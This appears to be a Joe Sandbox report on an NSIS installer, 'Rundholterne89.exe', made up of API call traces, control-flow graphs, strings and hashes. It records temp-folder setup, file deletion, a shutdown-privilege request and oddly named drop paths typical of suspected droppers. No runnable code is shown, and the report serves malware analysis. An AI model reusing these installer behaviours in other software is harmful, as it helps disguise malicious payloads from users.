                                                                                            • GetVersion.KERNEL32 ref: 0040313A
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                            • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                            • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                            • GetCommandLineA.KERNEL32(Hermandas Setup,NSIS Error), ref: 004031BD
                                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Rundholterne89.exe",00000000), ref: 004031D0
                                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Rundholterne89.exe",00000020), ref: 004031FB
                                                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                            • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                            • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                            • ExitProcess.KERNEL32 ref: 0040342D
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                            • ExitProcess.KERNEL32 ref: 004035CF
                                                                                              • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                            • String ID: "$"C:\Users\user\Desktop\Rundholterne89.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Desktop$C:\Users\user\Desktop\Rundholterne89.exe$Error launching installer$Hermandas Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
                                                                                            • API String ID: 3329125770-3009530420
                                                                                            • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                            • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                            • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                            • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                            • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                            • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                            • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                                                            • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                            • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 1638840714-813528018
                                                                                            • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                            • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                            • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                            • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                                                            • GetSystemDirectoryA.KERNEL32(C:\Users\user\Stanglorgnet.bro,00000400), ref: 00405E7D
                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\Stanglorgnet.bro,00000400), ref: 00405E90
                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
                                                                                            • SHGetPathFromIDListA.SHELL32(0041C205,C:\Users\user\Stanglorgnet.bro), ref: 00405EDA
                                                                                            • CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
                                                                                            • lstrcatA.KERNEL32(C:\Users\user\Stanglorgnet.bro,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\Stanglorgnet.bro,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                            • String ID: C:\Users\user\Stanglorgnet.bro$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 900638850-1361145835
                                                                                            • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                            • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                            • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                            • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 556 4055d1-4055f7 call 40588f 559 405610-405617 556->559 560 4055f9-40560b DeleteFileA 556->560 562 405619-40561b 559->562 563 40562a-40563a call 405d2f 559->563 561 40579a-40579e 560->561 564 405621-405624 562->564 565 405748-40574d 562->565 571 405649-40564a call 4057e8 563->571 572 40563c-405647 lstrcatA 563->572 564->563 564->565 565->561 567 40574f-405752 565->567 569 405754-40575a 567->569 570 40575c-405764 call 406033 567->570 569->561 570->561 580 405766-40577a call 4057a1 call 405589 570->580 573 40564f-405652 571->573 572->573 576 405654-40565b 573->576 577 40565d-405663 lstrcatA 573->577 576->577 579 405668-405686 lstrlenA FindFirstFileA 576->579 577->579 581 40568c-4056a3 call 4057cc 579->581 582 40573e-405742 579->582 592 405792-405795 call 404f48 580->592 593 40577c-40577f 580->593 590 4056a5-4056a9 581->590 591 4056ae-4056b1 581->591 582->565 584 405744 582->584 584->565 590->591 594 4056ab 590->594 595 4056b3-4056b8 591->595 596 4056c4-4056d2 call 405d2f 591->596 592->561 593->569 598 405781-405790 call 404f48 call 405bea 593->598 594->591 600 4056ba-4056bc 595->600 601 40571d-40572f FindNextFileA 595->601 606 4056d4-4056dc 596->606 607 4056e9-4056f4 call 405589 596->607 598->561 600->596 605 4056be-4056c2 600->605 601->581 604 405735-405738 FindClose 601->604 604->582 605->596 605->601 606->601 609 4056de-4056e7 call 4055d1 606->609 616 405715-405718 call 404f48 607->616 617 4056f6-4056f9 607->617 609->601 616->601 619 4056fb-40570b call 404f48 call 405bea 617->619 620 40570d-405713 617->620 619->601 620->601
                                                                                            APIs
                                                                                            • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                            • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                            • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                            • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                            • \*.*, xrefs: 0040563C
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 004055D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-3741676201
                                                                                            • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                            • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                            • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                            • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNELBASE(774D3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                            • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                            • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                            • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 250 403a41-403a53 251 403b94-403ba3 250->251 252 403a59-403a5f 250->252 254 403bf2-403c07 251->254 255 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 251->255 252->251 253 403a65-403a6e 252->253 256 403a70-403a7d SetWindowPos 253->256 257 403a83-403a86 253->257 259 403c47-403c4c call 403f60 254->259 260 403c09-403c0c 254->260 255->254 256->257 262 403aa0-403aa6 257->262 263 403a88-403a9a ShowWindow 257->263 267 403c51-403c6c 259->267 265 403c0e-403c19 call 401389 260->265 266 403c3f-403c41 260->266 268 403ac2-403ac5 262->268 269 403aa8-403abd DestroyWindow 262->269 263->262 265->266 287 403c1b-403c3a SendMessageA 265->287 266->259 272 403ee1 266->272 273 403c75-403c7b 267->273 274 403c6e-403c70 call 40140b 267->274 278 403ac7-403ad3 SetWindowLongA 268->278 279 403ad8-403ade 268->279 276 403ebe-403ec4 269->276 275 403ee3-403eea 272->275 283 403c81-403c8c 273->283 284 403e9f-403eb8 DestroyWindow EndDialog 273->284 274->273 276->272 281 403ec6-403ecc 276->281 278->275 285 403b81-403b8f call 403f7b 279->285 286 403ae4-403af5 GetDlgItem 279->286 281->272 289 403ece-403ed7 ShowWindow 281->289 283->284 290 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 283->290 284->276 285->275 291 403b14-403b17 286->291 292 403af7-403b0e SendMessageA IsWindowEnabled 286->292 287->275 289->272 320 403ce1-403ce6 290->320 321 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 290->321 295 403b19-403b1a 291->295 296 403b1c-403b1f 291->296 292->272 292->291 298 403b4a-403b4f call 403eed 295->298 299 403b21-403b27 296->299 300 403b2d-403b32 296->300 298->285 301 403b68-403b7b SendMessageA 299->301 302 403b29-403b2b 299->302 300->301 303 403b34-403b3a 300->303 301->285 302->298 306 403b51-403b5a call 40140b 303->306 307 403b3c-403b42 call 40140b 303->307 306->285 317 403b5c-403b66 306->317 316 403b48 307->316 316->298 317->316 320->321 324 403d27-403d28 321->324 325 403d2a 321->325 326 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403d5c-403d6d SendMessageA 326->327 328 403d6f 326->328 329 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 327->329 328->329 329->267 338 403db4-403db6 329->338 338->267 339 403dbc-403dc0 338->339 340 403dc2-403dc8 339->340 341 403ddf-403df3 DestroyWindow 339->341 340->272 342 403dce-403dd4 340->342 341->276 343 403df9-403e26 CreateDialogParamA 341->343 342->267 344 403dda 342->344 343->276 345 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 343->345 344->272 345->272 350 403e85-403e98 ShowWindow call 403f60 345->350 352 403e9d 350->352 352->276
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                            • ShowWindow.USER32(?), ref: 00403A9A
                                                                                            • DestroyWindow.USER32 ref: 00403AAE
                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                            • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                            • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                            • lstrlenA.KERNEL32(00429868,?,00429868,Hermandas Setup), ref: 00403D8E
                                                                                            • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • String ID: Hermandas Setup
                                                                                            • API String ID: 3282139019-232963439
                                                                                            • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                            • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                            • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                            • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                                                            Control-flow Graph
                                                                                            control_flow_graph 353 4036af-4036c7 call 4060c8 356 4036c9-4036d9 call 405c8d 353->356 357 4036db-40370c call 405c16 353->357 364 40372f-403758 call 403974 call 40588f 356->364 362 403724-40372a lstrcatA 357->362 363 40370e-40371f call 405c16 357->363 362->364 363->362 371 40375e-403763 364->371 372 4037df-4037e7 call 40588f 364->372 371->372 373 403765-403789 call 405c16 371->373 378 4037f5-40381a LoadImageA 372->378 379 4037e9-4037f0 call 405d51 372->379 373->372 380 40378b-40378d 373->380 382 40389b-4038a3 call 40140b 378->382 383 40381c-40384c RegisterClassA 378->383 379->378 385 40379e-4037aa lstrlenA 380->385 386 40378f-40379c call 4057cc 380->386 394 4038a5-4038a8 382->394 395 4038ad-4038b8 call 403974 382->395 387 403852-403896 SystemParametersInfoA CreateWindowExA 383->387 388 40396a 383->388 392 4037d2-4037da call 4057a1 call 405d2f 385->392 393 4037ac-4037ba lstrcmpiA 385->393 386->385 387->382 391 40396c-403973 388->391 392->372 393->392 398 4037bc-4037c6 GetFileAttributesA 393->398 394->391 406 403941-403949 call 40501a 395->406 407 4038be-4038d8 ShowWindow call 40605a 395->407 399 4037c8-4037ca 398->399 400 4037cc-4037cd call 4057e8 398->400 399->392 399->400 400->392 412 403963-403965 call 40140b 406->412 413 40394b-403951 406->413 414 4038e4-4038f6 GetClassInfoA 407->414 415 4038da-4038df call 40605a 407->415 412->388 413->394 416 403957-40395e call 40140b 413->416 419 4038f8-403908 GetClassInfoA RegisterClassA 414->419 420 40390e-403931 DialogBoxParamA call 40140b 414->420 415->414 416->394 419->420 424 403936-40393f call 4035ff 420->424 424->391
                                                                                            APIs
                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                            • lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rundholterne89.exe",00000000), ref: 0040372A
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\Stanglorgnet.bro,?,?,?,C:\Users\user\Stanglorgnet.bro,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,774D3410), ref: 0040379F
                                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
